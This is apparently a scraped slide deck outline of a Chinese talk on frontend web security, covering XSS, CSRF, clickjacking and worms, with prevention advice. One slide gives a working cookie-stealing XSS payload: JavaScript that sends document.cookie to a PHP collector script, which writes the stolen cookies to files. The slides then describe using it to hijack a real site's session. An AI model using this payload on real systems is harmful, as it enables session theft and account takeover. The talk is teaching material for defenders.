Empfohlen
Weitere ähnliche Inhalte
Was ist angesagt?
安全那些事儿
- 1. 安全那些事儿 明城
- 2. 说些猥琐的话题
- 3. 严肃点…
- 5. “ 安全第一,文明操作”
- 8. 前端,是数据流的引入者
- 9. 所以…
- 11. “ 抓稳,咱启航了!”
- 12. 常见前端攻击方式
- 13. 我们的航海图
- 14. XSS , Web 攻击之源
- 15. XSS 不像 CSS 那么优美 跨站脚本攻击( Cross-site scripting ,通常简称为 XSS )是 一种网站应用程式的安全漏洞攻击,允许恶意使用者将程式码 注入到网页上,其他使用者在观看网页时就会受到影响。
- 16. 典型的 XSS 注入
- 17. XSS 的危害 •盗取用户 Cookie •修改页面 DOM •作为其他攻击的跳板 •…
- 18. 攻击案例 Yupoo 的 XSS 漏洞
- 19. 攻击原理 用 Yupoo 某处的 XSS 漏洞盗取用户 Cookie 信 息,然后伪造 Cookie 模拟登陆。
- 20. 船长,发现 XSS 漏洞! 不要小看 alert ,这表明你已经拥有了对这页面的控制权 !
- 21. 构建“传说中的”攻击脚本 客户端( Javascript ) var img = new Image(); img.src = 'get_cookie.php?var='+encodeURI(document.cookie); 服务器端( PHP ) <?php if (isset($_GET['var'])) { file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var'])); }
- 23. 广告过后,马上回来…
- 24. 船长,“鱼”上钩了! 于是乎,通过这个 XSS 漏洞,我们就获 取到了这家伙的 Cookie 。
- 25. 接下来的情节,少儿不宜
- 26. 那么,如何防范 XSS •Filter input,Escape output (过滤输入,转义输出) •严格控制 Cookie 域 •禁用客户端脚本
- 28. 咳咳,休息一下…
- 29. CSRF ,苏醒的巨人
- 30. 学术化的定义 CSRF ( Cross Site Request Forgery )是伪造 客户端请求的一种攻击,字面上的意思是跨站 点伪造请求。
- 32. 攻击案例 饭否的 CSRF 蠕虫攻击 Knownsec Team http://www.knownsec.com
- 33. 饭否的 CSRF 蠕虫攻击 原理:通过第三方页面 POST 私信给好友, 继而递归的传播。
- 34. 看片来得凶猛些…
- 35. 那么,如何防范 CSRF •正确使用 GET 、 POST 和 Cookie •使用 Referer 判断请求来源 •在请求中使用 Security token •妈妈说了,不要打开陌生的链接
- 37. 其他攻击方式
- 38. Clickjacking
- 39. 蠕虫和钓鱼
- 40. 冥思
- 41. “ 噢,船长,我的船长!”